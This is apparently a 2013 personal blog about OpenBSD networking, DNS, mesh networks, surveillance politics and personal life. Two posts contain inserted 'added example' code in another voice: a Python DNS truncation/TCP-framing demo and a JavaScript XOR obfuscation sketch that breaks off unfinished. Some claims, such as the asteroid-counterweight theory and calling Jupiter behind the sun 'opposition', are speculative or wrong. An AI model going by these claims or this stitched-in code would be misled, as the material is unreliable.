I wear glasses. As a teenager I wore contacts predominantly. But I can't understand anyone wanting to give their life to google by wearing google glasses. Oh yes, life may be better because it may have been without hope at some point. But what of that is just illusion? Now the concept of google glasses isn't so bad. Until the part where you upload. To Google. Enough said.



We don't really have alternative access

May 4th, 2013

The german telco DT has capped its links to 75 GB if you use 16 Mbit DSL. What I thought about is the alternatives... there are none. DT has assets of 500K Euros per employee of its 230,000 workforce. And they own the copper links. Does that mean the DT can do with us what they want? There is only one alternative, and it doesn't scale. Check freifunk.de which is a citizen built Wifi mesh. They do not exist on a scale the size of Germany and beyond so they don't really scale. We need something to counter big evil telcos who do with us what they want.



Ordered a new book from Amazon

May 5th, 2013

It's another Ruby book. I fear I never get to read all these books fully because as soon as I get started with one I already have the next one. But I'm easily bored, confused, irritated with some books and their delivery style. Hoping this one will be a thriller. It's called Practical Ruby for System Administration by Andre Ben Hamou. I should have it delivered to my parents in 3 days.



Earworms, Ohrwurms and co.

May 6th, 2013

I've been diagnosed of Schizophrenia at least once in my life. I also have been diagnosed of depression, and OCD which is a form of Tic disorder. However what I haven't been diagnosed with is "Susceptible to Earworms" disorder. An earworm is when you hear music and it plays over and over in your head, in my case it can be as little as one syllable as in a simple "oh" of the reggae artists Vybz Kartel or as high as I would guess ten syllables. In fact I've never heard a single voice in my head that I didn't hear before, most of them stem from music I hear and very rarely from other recordings, yet the headmusic keeps going at the weirdest moments.

It makes me a little paranoid to be honest, and I suspect my medication I currently take amplifies earworms. Now it doesn't matter what music I listen to I get the bug but I prefer to be listening to Reggae music at home. Current head spinners that I like listening to are Alaine - Jehovah (listen close to the syllables as they are a classic reggae beat), Lutan Fyah - Bossman, and Turbulence & I-Shenko - Obeah man. The latter two are off the downtown riddim collection which I like listening to as well.

As I walk down the street with headmusic in my brain, I wonder if it's noticeable. When I go into a supermarket I usually get inducted with white peoples music or whatever is playing on german radio, something like "message in a bottle" by the police/sting. Usually I leave the store playing repeating sentences of message in a bottle in my head. Totally bugged out!



Changed blog a little

May 6th, 2013

I hope you like it. When I went to a CSS class the instructor said that in Germany or any place that you read left to right there is a menu bar on the left. Well in my case it's on the right, which would make my style arabic or persian. As a compromise I have added a black bar on the left now so that there are bars on both sides of the article. I think it looks better now and I'm working on fixing the jagged edges.



Asterisk patch

May 7th, 2013

I have made a patch for asterisk. They don't accept it though and I had to sign an NDA agreement in order to submit patches. Sheesh.



Hackathon Trademark

May 8th, 2013

Peter Hansteen (I've had the pleasure of meeting him once at a EuroBSDCon), has written about the term "hackathon" being trademarked. The people (Young Targets) who trademarked this term charged up to 2500 euros per violation in Germany. On the mailing lists misc@ (OpenBSD) someone said they gave up claim of trademark on the term "hackathon", which is a win for the free world.

As a note of interest I was a regular at the GTABUG (Greater Toronto Area BSD User Group) right from its start in 1999 to around 2001. In around the year 2000, Louis Bertrand (I think) organized installathons, and word had it that it came from the word hackathon, or the two terms came from each other. That's probably longer in time than Young Targets had ever conceived of the term.



Strato.com HIDRIVE is real slow today

May 8th, 2013

I decided to download my backups today and I think I'm going to do it tomorrow morning, as the route from 2 sources to sftp.hidrive.strato.com is real slow. Both go through DECIX and stall all the time:

/users/label-3462/backup-gf20130506.tar.X.gz   32% 1339MB 234.4KB/s - stalled -

So I don't know if this should be a buyers beware signal. But let's see how it works tomorrow.

[pjp@trojan ~]$ traceroute sftp.hidrive.strato.com
traceroute to sftp.hidrive.strato.com (85.214.3.70), 64 hops max, 52 byte packets
 1  static.65.5.40.188.clients.your-server.de (188.40.5.65)  2.368 ms  2.038 ms  0.826 ms
 2  hos-tr4.juniper3.rz10.hetzner.de (213.239.236.113)  0.296 ms
    hos-tr2.juniper3.rz10.hetzner.de (213.239.236.81)  0.312 ms  0.304 ms
 3  hos-bb1.juniper1.ffm.hetzner.de (213.239.240.224)  5.096 ms  6.030 ms  5.206 ms
 4  atuin.rzone.de (80.81.192.110)  32.147 ms  5.335 ms  5.316 ms
 5  te0-1-0-6.core-b1.as6724.net (85.214.0.70)  17.631 ms  17.838 ms  18.989 ms
 6  be1.core-b2.as6724.net (85.214.0.33)  18.065 ms  17.918 ms  18.091 ms
 7  te1-1.core-b4.as6724.net (85.214.0.37)  17.868 ms  18.046 ms  17.709 ms
 8  ssh.hidrive.strato.com (85.214.3.70)  17.691 ms  17.799 ms  17.524 ms



Finished upgrading to OpenBSD 5.3

May 9th, 2013

mars - check.
jupiter - check.
luna - check.
and finally uranus - check.

All my computers that needed upgrading are upgraded. One thing about 5.3. My IPv6 setup stopped working. Something went in the 5.3 code that caused everything to fail. I'll have to figure out something new...



New Intro Screen with Animation

May 10th, 2013

The Centroid.EU website has a new intro screen. If you have the blog bookmarked you can simply click on the logo on the right hand side.

I painstakingly wrote the javascript for this, and I'm pretty proud.



NASA Asteroid Mission, not a bad idea

May 11th, 2013

So what can you do with a chunk of mass? Well for one you don't have to bring it up by means of earth rocket. I believe the Americans are not being honest with us in some respect. Because the asteroid is either the forerunner or the initial counterweight to a lunar space elevator (see here). Even if this asteroid mission is a failure at least we can stroke out visionaries use of countermass being asteroids then. The asteroid as an LSE counterweight is gonna make the US a lot of money, in savings. They don't have to use precious fuel to land on the moon anymore but rather take the lift down to the surface of the moon. And that's where the money's at, at least in the foreseeable space-faring future.

I have drawn 2 LSE's roughly of how it looks like (one is international and the other belongs to the USA). The counterweights span from L1 to L2 lunar-earth orbit so the cables are around 100,000 km long.

Why do I think there is money to be made on the moon? Well for one the human space exploration is destined to go to the moon because we have too much space junk in earth orbit to sustain living there in reasonable safety. It is a fact that the ISS has to fire thrusters to evade space junk every so often and it takes supercomputers to figure out if any junk is threatening the space station. The moon on the other hand is still a space junk virgin. Also there are resources on the moon. It isn't just a dead rock made of silicon and basalt (in some respects I wish it was). No. There are elements that can harbour life as we know it, and we can mine the moon for resources. Take the fact that asteroids occasionally fall on the surface of the moon. These contain metals so they are just waiting to be mined. With a moon elevator the rocks could be sent to space and there they could be molten with an array of mirrors from the sun. By means of centrifugal forces the metal could be extracted and formed from the impurities. Then the pure metals could be brought back down to the surface of the moon to build further space capsules or a set of tubes that are part of the space bases that I think are inevitable. The trade between the moon and earth would likely be human cargo (such as specialists to better the industrial output of the moon) and data (on the far side of the moon there is no radio interference making it an ideal spot for radio-astronomy and SETI).



Got a shot of moon and Jupiter

May 12th, 2013

By placing the camera on the railing of the balcony and putting on self-timer I reduced some of the jitter for the handheld pos camera.



Politics: I'm still a pirate

May 13th, 2013

I'm looking forward to the german election in the fall. I will be voting for the pirate party of germany as I think they are right on. My hope is that the pirates are going to overcome the 5% of votes needed to enter parliament. And then it'll be wake-up time for the bigger parties.



Crossing my fingers for Chris

May 13th, 2013

Tonight at 7PM EDT, Chris Hadfield undocks with two other Astronauts from the ISS. He's the coolest Astronaut I know of. Google for him and the ISS for some great youtube videos, they are really heart touching. I hope the landing goes well for him when he comes back to earth.



Freifunk Schweinfurt is alive

May 13th, 2013

I have added an access point to my network. It is firewalled to shits but it lets UDP through. A wildcarddnsd is wildcarding the entire DNS tree from root to branch and gives out only 1 IP, it seems to work magic... here is the config file:

version "5";

wildcard-only-for "wildcard everyone" {
        0.0.0.0/0;
        ::/0;
}

zone "default" {
        *,soa,3600,miranda.solarscale.de.,hostmaster.solarscale.de.,1,3600,1800,7200,3600
        *,a,3600,192.168.32.1
}

So then I use redirection rules in pf to redirect all web and DNS to apache httpd or wildcarddnsd.

# grep rdr-to /etc/pf.conf
match in on em0 proto udp from 192.168.32.0/24 to any port 53 rdr-to 127.0.0.1
pass in on em0 proto tcp from 192.168.32.0/24 to any port 80 rdr-to 127.0.0.1

The website says something like "dear neighbour, you can use UDP through this gateway but it's only outbound and doesn't return inbound". I have also rate limited how much can be sent, the rule for that is:

pass in log on em0 proto udp from 192.168.32.0/24 to any keep state (max-src-conn-rate 1/20) 

This means that only 1 packet per every 20 seconds should emanate from this access point.

What I hope to achieve with this is that people will build their own SMS mechanism and send out SMS messages out via UDP to a gateway of sorts. It could be interesting for someone's car ie. as soon as the car pulls up in the parking lot next door it sends an SMS saying it's arrived at its destination.

This is no ordinary access point, you can't surf with it, you can't do much with it really. But it may delight someone's nerdiness of what they can do. Non-nerds need not apply, and nerds in training are welcome. My next goal is to look at openwrt and see if I can better this access point somewhat.



My idea for a virtual reality headset

May 15th, 2013

If you haven't heard of Oculus Rift then perhaps you're not reading the same literature and magazines as me. They are VR goggles at a reasonable price. Right now they are in development and we have still to see if they will make it out to the mainstream production. Anyhow I have thought of a useful tool for headsets such as these.

Basically I want to explore my computer for security and informative needs. What I envision is a filesystem displayed in a 3D environment ala fsn (see also fsv) by a program. This program also polls the kernel for events ala inotify and displays accesses with a pop-up or flash. This way a person can step back on the filesystem and gain the big picture. A replay function would be good so that one can investigate what happened.

Since in UN*X everything is pretty well a file this should unearth some questions hopefully, and then one has to search for answers. OpenBSD currently has no inotify mechanism, and I'm investigating whether it's worth pursuing this or whether my idea will be left for someone else... the decision process could take years same with the development process.



OpenBSD fixes a panic I found

May 17th, 2013

I found a condition that made the kernel panic when I'd execute a certain code. It took less than a day to get an interested OpenBSD developer to produce a patch, after review it'll be committed before 5.4 hopefully. This is why OpenBSD and open source in general rocks!



Second Video Blog (Vlog?) entry

May 21st, 2013

It's another bad hairday lol... I'm just very unkempt. :]



Experimenting with an RSS feed

May 21st, 2013

Today I've written a small PHP script to convert my blog to XML and RSS. On the right hand side is now the RSS button with the feed. I'd appreciate it if someone who knows their stuff about this would send me an email if you noticed something wrong with this feed. Right now it only dumps the last 10 articles but I can make it higher or lower if need be. My PHP really sucks I noticed but somehow I managed to write this out.



This is a valid RSS feed

May 22nd, 2013

I fixed it up and earned this banner from w3c. [Valid RSS]



Move DNS to TCP? Great Idea! Really...

May 22nd, 2013

I was made aware of slides from a talk by Ed Lewis from Neustar. Here they are. While some intention is lost by reading slides, I think what he means to say is that in an ever evil-growing Internet, UDP DNS needs to be replaced. I agree to this and wonder if he's been reading my contribution to Hackepedia regarding amplification attacks. So what's the big deal? The big deal is that people either purposely or innocently leave recursive dns servers on their VPS's and colocated servers. These are amounting to great numbers and can be used for amplification attacks to great bandwidths, as a recent attack on Spamhaus was huge.

As you may know I write a DNS server, and it's not easy, but I have some familiarity with the protocol. What Ed Lewis is saying is true and right. We can't wish the evil people away, we must fix the protocol to keep it from being used for evil. One way to do that is to use TCP. Now TCP is a stateful protocol, it has a PCB (protocol control block) in the kernel that keeps track of its state. In the past DNS over TCP was restricted to AXFR, and one would not dare mention (taboo) using DNS over TCP for other resource records. Mainly because Operating Systems wouldn't be able to keep up. But it's the 21st century and RAM has gotten cheap. There is lots of RAM for many PCB's and CPU's have also increased in efficiency and speed. So... Why not? I agree something must be done.
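
The post argues for moving DNS off UDP to blunt amplification. As an added example (not code from this blog, from wildcarddnsd or from the slides), the Python below goes one step beyond the post's text and shows the standard in-protocol way a server pushes a client to TCP: a header-plus-question reply with the TC bit set is no larger than the query, and the retry uses the two-byte length framing of DNS over TCP. The name example.com, the query ID and the 3000-byte reply size are constructed sample values.

```python
import struct

HEADER = struct.Struct("!HHHHHH")  # id, flags, qdcount, ancount, nscount, arcount
QR, OPCODE, TC, RD = 0x8000, 0x7800, 0x0200, 0x0100

# Constructed figure: size of a large answer an open resolver might send over UDP.
CONSTRUCTED_UDP_REPLY_SIZE = 3000


def encode_name(name):
    """Encode a host name as uncompressed DNS labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("label must be 1..63 bytes")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(qid, name, qtype=1):
    """Standard recursive query: one question, class IN."""
    return (HEADER.pack(qid, RD, 1, 0, 0, 0)
            + encode_name(name) + struct.pack("!HH", qtype, 1))


def question_end(msg):
    """Offset just past the first question; rejects malformed input."""
    pos = HEADER.size
    while True:
        if pos >= len(msg):
            raise ValueError("question runs past end of message")
        length = msg[pos]
        if length & 0xC0:
            raise ValueError("compression pointer not expected in a query")
        pos += 1 + length
        if length == 0:
            break
    if pos + 4 > len(msg):
        raise ValueError("missing qtype/qclass")
    return pos + 4


def truncated_reply(query):
    """Smallest useful UDP reply: echo the question, set TC=1, no records.
    A real client then repeats the question over TCP; a spoofed source
    only ever receives a packet the same size as the forged query."""
    if len(query) < HEADER.size:
        raise ValueError("short message")
    qid, flags, qdcount, _, _, _ = HEADER.unpack_from(query)
    if flags & QR or qdcount != 1:
        raise ValueError("not a single-question query")
    new_flags = QR | TC | (flags & (OPCODE | RD))
    question = query[HEADER.size:question_end(query)]
    return HEADER.pack(qid, new_flags, 1, 0, 0, 0) + question


def parse_header(msg):
    qid, flags, qd, an, _, _ = HEADER.unpack_from(msg)
    return {"id": qid, "qr": bool(flags & QR), "tc": bool(flags & TC),
            "rd": bool(flags & RD), "qdcount": qd, "ancount": an}


def frame_for_tcp(msg):
    """DNS over TCP prefixes every message with a 16-bit length."""
    if len(msg) > 0xFFFF:
        raise ValueError("message too large for TCP framing")
    return struct.pack("!H", len(msg)) + msg


def unframe_tcp(buf):
    """Split a TCP byte stream into whole messages plus unread remainder."""
    msgs = []
    while len(buf) >= 2:
        (n,) = struct.unpack_from("!H", buf)
        if len(buf) < 2 + n:
            break  # partial message, wait for more bytes
        msgs.append(buf[2:2 + n])
        buf = buf[2 + n:]
    return msgs, buf


def amplification(query_len, reply_len):
    """Bytes sent to the (possibly spoofed) source per byte received."""
    return reply_len / query_len


if __name__ == "__main__":
    q = build_query(0x1234, "example.com")
    r = truncated_reply(q)
    print("query bytes:", len(q), "TC reply bytes:", len(r))
    print("UDP full answer factor:",
          round(amplification(len(q), CONSTRUCTED_UDP_REPLY_SIZE), 1))
    print("TC reply factor:", amplification(len(q), len(r)))
```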



Alphabetical countup AWK beats Ruby 1.8

May 23rd, 2013

Here is the code written by Figz in awk and shell script:

#!/bin/sh

awk 'BEGIN { for (i = 65; i < 91; ++i) { c = sprintf("%c", i);  h[c] = \
h[tolower(c)] =  i - 64 } } { tot = 0; for (i = 1; i <= length(); ++i) \
tot += h[substr($0, i, 1)]; print tot, $0 }' /usr/share/dict/words | \
sort -n

Here is the ruby 1.8 code (took me a long time to get it right):

#!/usr/local/bin/ruby -w

ahash = Hash.new

('a'..'z').each { |a| ahash[a] = ahash[a.upcase] = (a[0] - 96).to_i}

open("/usr/share/dict/words", "r") { |f| f.each {
                |w|
                count = 0
                (0..w.length - 2).each { 
                        |c| 
                                count += ahash[w[c,1]];
                }
                puts "#{count} #{w}"
        }
}

And here are the timings:

jupiter$ time ./syn.rb | sort -n > blah.2 
    0m5.10s real     0m4.78s user     0m0.06s system
jupiter$ time ./syn.sh > blah.1           
    0m3.45s real     0m3.38s user     0m0.04s system
jupiter$ diff -u blah.1 blah.2

I don't think I can make the ruby any faster...



Added squid proxy to mars

May 24th, 2013

I have added a squid proxy to mars. It is transparent (used with divert-to rules). Because of the nature of asymmetric routing going on it took me around 45 minutes to isolate where a route was going, and it was getting stuck on my AVM Fritzbox router. I can't really blame them, but laying a static route from mars to Gaia fixed it up. Here is the new network again:

Because the tunnels are MTU 1280 there was some sort of mismatch between mss and fragmenting (which I don't know how well openbsd does it). It turned out to be that Videos being loaded by Gaia would get stuck 10 minutes into the video. I don't even try to figure that out, I placed the squid in the network and it has a more direct route to the AVM Fritzbox which rewrites mss and mtu anyhow because it uses PPPoE. The squid fixes all these things and I'm pretty happy.



Panama getting more bandwidth in 2014

May 24th, 2013

This article talks about a new 6000 kilometer cable with landing stations in Panama. As you may or may not know, my host americas.centroid.eu is located in Panama and it's going to be interesting whether I will profit from this or not. The profit would be in stability and reachability.



Goldflipper.net expires today

May 25th, 2013

Goodbye goldy. It was a good 3 years. I do hope I have everything set so that its expiration will not cause problems on my operation. And I have one less domain to worry about.



Purchased an ipod touch

May 29th, 2013

Yesterday, I purchased an ipod touch. I have several books on IOS programming and intend to write my own apps for it. Also I may be using it for my video blog entries as the camera is about the same quality as my webcam, we'll see.



Changed the Main Page

June 2nd, 2013

Now that I have a mobile device I noticed how my site sucked on a mobile device. So I made a redirect based on User-Agent string. This was easy to do because the main page is served with PHP. It now redirects to a white page. If you are on a computer and not a mobile device and it redirects you to /mobile.php then this is an error and I'd appreciate it if you would let me know this. Thanks.



OpenBSD Arrived! VLOG entry #3

June 4th, 2013

Finally after ordering it on April 6th, it's here!



Donation time again

June 7th, 2013

Since I was already doing a few errands, I donated 50 euros to OpenBSD. I also renewed my VPS in Panama for another year (78 euros), and attempted to renew my VPS in Hong Kong, however I had to submit a ticket to them first.

I'm looking forward to using all my VPS setup another year.



A second arctic route...

June 8th, 2013

On Greg's cable map there is a second route going through the arctic and it's said to happen in 2014. Remember I had a story about Arctic Fibre here a while ago. While arctic fibre goes along the north-west passage the Polarnet Project goes along the north-east passage and is said to be 190 ms from London-Tokyo. Remember the soundings I took with ping and traceroute and I expect that my route will alternate between arctic fibre and polarnet when I go to hong kong after 2014. I totally envision 280-290ms round-trip latency, it'll be awesome! My Hong Kong VPS rocks; yesterday I renewed it for another year until September 2014, which will be just shy of seeing this fibre go into production, if I renew again though it'll rock.



Success! I ran an app on my iPod

June 11th, 2013

I have been creating apps since last year. All of these were from examples found on youtube. So then I finally got around my provisioning problems at Apple and ran one app on my ipod. Now I know that it works I'm going to be switching to one of my books for creating IOS apps. There is a steep learning curve to master. But it'll be fun as I can run the code on my ipod now and play with it. I have also ordered 3 more books in a discounted deal from amazon.com. When I get them I'll release their names. But they deal with IOS 6. I know, I know IOS 7 will be out soon but when it does come out I'll be buying IOS 7 books too.

So what sort of app do I want to build for download in the app store? Hmm. Well I had thought about building an app that doubles as a mouse pointer for a computer. Basically you connect to the computer with wifi, network or bluetooth and enter a password, then whatever you move over the ipod's glass surface gets translated on the computer's X11 display. It will need a custom X11 mouse driver as well, which shouldn't be too hard I believe as sourcecode for other mouse drivers exists. Once this project is finished I want to start building the interface for a virtual ipod (in virtual reality). So that you can have goggles on and have an ipod which you see in VR space. You also see Apps on this Ipod that don't exist in reality but moving your finger along the surface causes movement in the virtual reality and you can tap it and it will respond and such. That's phase two, but I'm only focusing on phase one right now.



FAAC compiles into ffmpeg on OpenBSD

June 11th, 2013

I wanted to do this. So I patched ffmpeg in the ports on OpenBSD like so after installing /usr/ports/audio/faac...


Now I can finally convert my AVI's on my Mac too. See if this one works for you on a Mac...



Vlog #4, just a test

June 12th, 2013

Just a test, but if it works for you on all browsers that'd be wicked.



Vlog #5 Got 3 books on IOS development

June 14th, 2013

Don't let my expression fool you. I'm very satisfied. It's just that I've been in a grumpy mood for the last two days so I don't look all that happy. The video was recorded on OpenBSD with my webcam, I reworked the audio with audacity on OpenBSD and converted both videos with ffmpeg from avi into their respective formats. To get the .m4v format you have to recompile ffmpeg on OpenBSD though. I'm considering doing a lot more video blog entries so you may as well get used to it, plus it may make it harder for the NSA to gain anything useful.



A german Google? Will the market allow it?

June 16th, 2013

I once programmed a web bot that would grab the index of random IP's out there. After running it a few days, I got a not-so-nice email from my german VPS provider that I was running malware, a certain virus. And they asked me to do something / stop. So my initial attempts failed at becoming a search engine. Now then in the german spiegel.de website someone has quoted the german interior ministers as saying they want a german Google to keep information local (and possibly also have the local three letter organisation spy on the data). They did say that the markets won't allow it in spiegel. And I think they are right, due to my previous attempts of running a bot.

Now if they are serious they'll have to open the Internet in terms of freedoms. Google only succeeded to become the #1 search engine because they could do anything they wanted, ranging from 1) doing anything they wanted with their web crawlers (googlebot), 2) doing anything technically possible with network technologies (BGP, IX's), 3) getting a googol worth of funding. There is possibly more that I'm not listing here. I believe I have some (little) insider knowledge (to online advertising) because I worked for a competitor to doubleclick which is now a part of google. Back then we thought about how we could collect as much data as possible to help us target advertising to respective people. We brainstormed a lot and tried to get access to these technologies. One find we had was that in internal IP data the BGP Autonomous System number was valuable to correlate where someone was. But it was not easy getting a BGP link, in fact to get there you have to be reasonably large and have cooperation of carriers to provide the redundant links to one. We weren't big enough and only had a single link to UUnet.ca, and hosted at Tier 2+3 providers. I believe because we could not make that curve that the company I worked for went out of business.

Back to my initial web crawler. I developed technology to crawl websites. I used this technology but was prohibited by administrative rules. Had I been able to continue I may have been able to make a business out of this. Slowly growing (had I wanted to do that) and perhaps gaining value beyond running the crawler on a VPS, perhaps a dedicated server next, then a colo, and then my own network. The dream had endless possibilities at its inception and was cut short by the markets (prohibitive administrative rules). Had I been able to continue who knows what would have happened. Given no resistance the possibilities are a Googol (10^100)!



Northern Solstice in 3 days

June 18th, 2013

I usually give out the solstice and equinoxes a few days before. So the northern solstice is upon us again. This is when the sun is at 90 degrees with the northern tropic, the Tropic of Cancer. This means summer in the northern hemisphere (officially), and winter in the southern hemisphere. Can you imagine snowfall in the Patagonia region of South America? I can't because summer is here in Europe, but it may be true.

After the sun reaches the Tropic of Cancer it turns around southward again, until it crosses the equator; that's officially the southbound equinox, also called the autumn equinox, and it will be the first day of fall in the northern hemisphere.



Some video about Wildcarddnsd

June 18th, 2013

This was really hard to do for me, considering there was hardly a script.



The moon last night

June 20th, 2013

From my balcony, but I was shaking the camera unfortunately...



Sunny Solstice

June 21st, 2013

Ever wonder where the sun is (constellation) when it's northern solstice?

Look how Jupiter is occulted by the sun. Not sure if it's the right term but does that mean it's at opposition? I thought this fact was special. Jupiter behind sun at solstice, both in the constellation of Taurus almost in Gemini. Can you feel their gravity pulling on you?



What government should do

June 23rd, 2013

Governments outside of the so-called five eyes nations are outraged over the PRISM and Tempora sniffing programmes. However you can't change a dumb user to not encrypt, in fact it's hard to encrypt for most people. I'm afraid there is no easy way, but perhaps the fabric of the Internet can be re-woven in such a way that PRISM and Tempora have a harder time gaining data. Let's pretend government said "we want you to use P2P protocols" and really encourages it. With P2P a lot of data is moved and it goes in all directions. I believe it would be a good initiative when you can't use encryption. Other than that perhaps develop Operating Systems and crypto systems outside of the USA and Britain in order to offset the current status quo. Also the structure of the Internet shouldn't just be a grand trunk with subnets, it should be a mesh and a mesh of hubs. Think about this last line a bit.



Got a new book

June 25th, 2013

I got this new book called "Absolute OpenBSD: UNIX for the practical paranoid" by Michael W. Lucas.



The Key Satellites

June 25th, 2013

We should encrypt our private conversations, how do we do that? I believe quantum encrypted laser links to polar orbiting satellites in low earth orbit are a good thing. These then communicate to higher geostationary satellites and vice versa. Whenever the geostationary satellites talk back to the polar satellites they wait until the beam is at a tangent with the curvature of the earth so that the beam would never hit earth. The transmission payload would be only AES or similar crypto keys which are then used symmetrically without asymmetric key exchange. I think this is worthwhile for states such as Germany and German embassies worldwide. A VPN to your embassy would be cool too if you're abroad somewhere in order to make use of this crypto. This is all a response to the TAT-14 spying.



UFO sighted

June 25th, 2013

I took this picture of a UFO outside my window. It's possibly a weather balloon judging by how it rose into the air. But the shape is somewhat odd.

You can click on the jpg to make it bigger I think. I scaled it 50%.



How everyone's Internet should be like

June 26th, 2013

When I speak to people about how the Internet should be like I liken it to a spider web.

The spider doesn't create one link but several, as means of redundancy and stability. So when humans build an Internet usually in its first phases it looks like this:

        o o o o o o o o o o o o o o o 
        | | | | | | | | | | | | | | |
        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-----(BR)----

In this ASCII drawing you have a trunk and end-users (drawn as "o"). There is a (BR) (bad router) that the government spies sit at and listen to everyone. We have to admit it's like this because it is. We are being spied upon and are making it very easy. But it doesn't have to be like that. We can make changes...we can work out a spider web between neighbouring houses (end-users). It would look like this:

As you can see everyone has 2 or more gateways that they use. This is what's called a "mesh" (and the purple links are its links). The model is just a small neighbourhood but it should be linked with an entire city like this. The light blue is gateways to the Internet. The Internet past these gateways should look like 1 house in this picture as well. The trick is to send packets in any random direction and the packet will seek its destination any random way. This requires new routing protocols that make this possible. It requires investments by neighbours to create the links, and government approval. It makes spying on the communications of any single person very difficult and that is its intent. Just we gotta realise this some day and do it.



This is for July 1st

June 26th, 2013

I'm putting this up now so that I don't forget later...

Happy Canada Day! Even though I'm absent from Canada I thought I'd say peace! Eh!?



Helping the NSA find baby-jesus

June 30th, 2013



Cherries!

July 1st, 2013

These were growing on my parents trees. Nice eh?



Weird Sky, more UFO's?

July 2nd, 2013

Out my Office window there is a spectacular cloud. Only it has jet trails going in on one end and coming out another. What happened in the cloud?

What I said to myself was "oh that's weird!"... after 5 minutes or so the jet on the right did not come out of the cloud, and the wind wiped the jet trails. Suspicious!



Good Engineering will prevent domestic Spying

July 3rd, 2013

Germany has a lack of engineers? Or are the good engineers not being heard? We should put engineering principles on the table to create an Internet that is safe from spying even if spying is outlawed. We cannot afford to be mass surveilled by a higher class of people. Internet should be fair for everyone. I don't blame the NSA as much as I blame BND. For them to say "OK we'll stop" is not good enough. We must re-engineer the entire fabric of the Internet in Germany, to secure everyone's privacy.



A Look back from 2001: Has my vision really changed?

July 4th, 2013

Happy US Independence day! Independence day to me, as an observer, stands for freedom. Freedom and a set of ideals. I recently came across an old project of mine called daemonium.com. It was to be a start-up ISP, but it wasn't meant to be. However I'd like to strike parallels to back then and now. Here is a screenshot from the wayback machine (archive.org).

Feel free to browse in the archive (without pictures) by following this link. Big on the front page of daemonium.com were the four statements: Cooperation, Innovation, Privacy, Trust. Daemonium's concept was very simple really. It was to be a DSL ISP but had a twist. It would use wifi to give people access to their neighbours and route around bad links. If you look a few articles down from this article you'll find how I think a neighbourhood should look. This concept is very similar, but different in the way that I'd not use wireless today but rather optical links such as an improved-upon RONJA. Daemonium's vision to grow into a campus was perhaps wrong but the rest is right on. Privacy is big in that project. I saw the dangers that we face today, only Google was not so popular back then, it was Yahoo and DoubleClick instead. Also I foresaw that government would try to mass surveil people, hence the wifi links with IPSEC that were to give privacy from snoops.

I could go deeper into this but I'd just like to leave the archive to you so you can make up your own mind. And I'd like to point out that the biggest change is a societal one, not that this is big technology. People have to take their freedom into their own hands and route around dangers that lurk in society, such as mass surveillance by secret services, police and people in positions of power. I don't see it happening, I see empty-handed people, victims of a digital divide. Perhaps my observation is wrong, and I hope we can get back to freedom the way it is meant to be. As for me, I'll keep dreaming.



2014, the year of the cable?

July 5th, 2013

PRISM is perhaps at its end. There are 2 non-US cables being laid that isolate the US entirely. Take a look at the following cables: BRICS, ROTACS and arcticfibre on Greg's Cable Map. BRICS and ROTACS open Asia to Europe and South America, avoiding the USA. This is all good for everyone, the US will have more capacity in its intra-national fibre all of a sudden, they'll also have fewer opportunities to spy on this data. It's also good for UNASUR countries who may want trade with Asia and don't want the US to know about it. And I believe my route may go through Moscow before long to reach Hong Kong, again avoiding US territory.

I'm thinking news of this all will make some people mad and others happy.



Redder Cherries

July 6th, 2013



DSL not working, getting LTE

July 7th, 2013

As you may or may not know, I work remotely over the Internet. So it's a great problem then, when my sole link to the Internet goes down. And it has been intermittently down since Wednesday. For the past few weeks I've been trying to get a hold of this shop to get me LTE and I surprisingly got a hold of him last week. He's got an LTE router and SIM card for me, that I'll use as a backup link. It'll cost more than my DSL and doesn't have as much traffic volume, but it's sufficient to give me a few days of DSL backup. My DSL will be fixed by Wednesday, my DSL provider m-net told me, but I can't wait, I gotta make money somehow. So in a way it's a blessing to be getting an LTE link. I couldn't get a Satellite link which would have been my first choice, because I don't face south with my apartment. And cable Internet isn't wanted by my landlord. I do have line of sight to a lot of people though that do have a southern sky. Any of my neighbours that are reading want to give me a sat backup? :-)



Got LTE, Internet is stable again

July 9th, 2013

I got LTE finally and configured it to my home network. Everything works again. Here is the timeline of what I noticed with my network.

  • Wednesday, June 26th, I noticed massive wifi interference and noise and I had to move to cable, I dug out my 20 meter cat5 cable and service was restored by Monday July 1st.
  • Wednesday, July 3rd, I noticed massive DSL resynchronisations and Internet became unbearable for me, it took until Saturday to get a ticket opened.
  • Monday July 8th, got LTE and restored service
  • Tuesday July 9th, moved back to wireless but into the 5 GHz spectrum where there are no interfering neighbours, in fact it seems around here the 5 GHz spectrum is entirely vacant, in contrast to the 2.4 GHz spectrum which has 10 or so APs on it.

All in all this has been a very stressful week; considering I work remotely over the Internet, it put strain on operations.



How the Internet should be like (Pt.2)

July 11th, 2013

I don't know where this is, it's somewhere in Africa, but the paths are an inspiration how the Internet should be like on earth.

Imagine the trails being cat5 cables, now imagine how you could route around a hut without being seen.

Also more importantly these trails were made by people for the people, and that's how the Internet should be like too. Forget it being served by telcos, that only invites spying.



IT Security, SSH timing attack

July 11th, 2013

This explains a lot. Thanks to Hawson for the link.



This blog now obfuscates all data

July 17th, 2013

I've had some problems with bots from companies that don't honour the robots.txt file. This exposed my blog to some search engines, not something I prefer. So I have started to obfuscate my blog with PHP and JavaScript. Basically it creates a random password and, based on that password, a random sequence of numbers: it hashes the password and takes the lowest byte, hashes the hash again and takes the lowest byte, and so on. After some processing the lowest bytes make a sequence that is always the same. When I XOR that sequence of bytes with my blog's contents, a garble results. It looks like encryption but it's not, it's only obfuscation; still, it gives people who sniff the wire a harder time figuring out what's going on, unless they also use JavaScript. AFAIK Googlebot uses JavaScript but it also honours robots.txt, so we're even on that. If you're using lynx you can't read this blog anymore unfortunately; switch to X11/Firefox.
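
The scheme described above, as an added example that is not the blog's own PHP or JavaScript: SHA-256, reading "lowest byte" as the last digest byte, base64 transport and all function names are assumptions. It shows why this is obfuscation and not encryption: the password has to ship with the page, so anything that runs the same steps gets the text back.

```javascript
// Added illustration of the hash-chain XOR obfuscation described in the post.
// Assumptions (not from the blog): SHA-256 as the hash, "lowest byte" = last
// digest byte, base64 for transport, and every function name below.
const nodeCrypto = require("crypto");

const sha256 = (buf) => nodeCrypto.createHash("sha256").update(buf).digest();

// Hash the password, keep the lowest byte, hash the hash, keep the lowest
// byte, and so on until there are n bytes. Same password, same sequence.
function keystream(password, n) {
  const out = Buffer.alloc(n);
  let h = sha256(Buffer.from(password, "utf8"));
  for (let i = 0; i < n; i++) {
    out[i] = h[h.length - 1];
    h = sha256(h);
  }
  return out;
}

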